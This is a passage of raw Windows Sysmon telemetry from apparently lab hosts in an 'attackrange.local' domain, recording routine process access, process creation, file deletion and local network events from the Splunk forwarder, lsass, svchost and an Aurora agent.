Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.865{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E501-63C7-6006-00000000AF02}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.866{FE4C2B44-E501-63C7-6006-00000000AF02}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.781{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9BA5BF593FFF833D8ABD0D13FD73E5F,SHA256=12FEF531EF5318BE01D8A9458DD155E46DDF3953A8081202BDA0CEAF6BAAC249,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017218Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:33.574{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CA735F62B1FFABEBDAD3D0FA0A95411,SHA256=65E1158953DCBDC6FC46E506C79FFDEB4EFBE878A96B86C5332C349FB6122DC0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-D9F1-63C7-0100-00000000AF02}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\kerberos.DLL+97b62|C:\Windows\system32\kerberos.DLL+79e38|C:\Windows\system32\kerberos.DLL+144ff|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+2d8f6|C:\Windows\system32\lsasrv.dll+33189|C:\Windows\system32\lsasrv.dll+30ad7|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+17a7d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x800000000000000044577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.480{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.480{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.197{FE4C2B44-E501-63C7-5F06-00000000AF02}49086848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.048{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.048{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.048{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.048{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.047{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.047{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.042{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E501-63C7-5F06-00000000AF02}4908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.041{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.041{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.040{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.040{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.040{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E501-63C7-5F06-00000000AF02}4908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.040{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E501-63C7-5F06-00000000AF02}4908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.040{FE4C2B44-E501-63C7-5F06-00000000AF02}4908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000017217Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:33.133{E5A8D418-E500-63C7-1602-00000000B002}20041980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017233Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.657{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=516A504D8EA2795A3AE346262E12792E,SHA256=033CDD0E13185395C4D94375476BF9EDD21C16179ABAB671169253DCA1048AA3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.063{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56394-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000044634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.063{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56394-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000044633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.060{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56393-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local49666- 354300x800000000000000044632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.060{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56393-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local49666- 354300x800000000000000044631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.059{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56392-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local135epmap 354300x800000000000000044630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.059{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56392-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local135epmap 354300x800000000000000044629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.966{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56391-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000044628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.966{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\System32\svchost.exeNT 